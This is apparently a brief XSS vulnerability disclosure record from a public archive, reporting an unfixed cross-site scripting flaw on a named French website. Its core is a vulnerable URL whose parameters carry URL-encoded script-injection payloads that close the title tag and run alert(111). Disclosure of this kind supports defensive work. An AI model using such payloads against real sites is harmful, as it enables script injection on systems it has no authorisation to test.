Unfixed XSS vulnerability at www.espace-plus.net

2008-11-22T00:00:00
ID XSSED:54841
Type xssed
Reporter xylitol
Modified 2011-11-29T00:00:00

Description

Security researcher xylitol, has submitted on 22/11/2008 a cross-site-scripting (XSS) vulnerability affecting www.espace-plus.net, which at the time of submission ranked 55626 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 29/11/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.espace-plus.net/pub_disclamer.php?synergie=%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3Ehetero&lg=fr%27%22%3E%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E/title%3E%3Cscript%3Ealert(111)%3C/script%3E&age=0%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E&rencontre=%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E&no=http%3A%2F%2Fdingophone.sonnerie.net&yes=http%3A%2F%2Fwww.zone-adulte.net%2Fvideo%2Fvideos-3-1049426-pdv3selfdailyunlog300x250general22Novembergeneraliste.php%3Ftracker%3Dselfdailyunlog-300x250-general-22-November_redir_0_0%26id%3D51120&scrolls=%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E&exit=%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E1&exit_url=http%3A%2F%2Foutils.yes-messenger.com%2Fpdv4.php%3Fe%3D1%26w%3D0%26tracker%3Dselfdailyunlog-300x250-general-22%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E-November_pop_0_0%26id%3D51120&exit_type=under&tracker=selfdailyunlog-300x250-%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3Egeneral-22-November_redir_0_0&disc_exit=%27%22%3E%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E1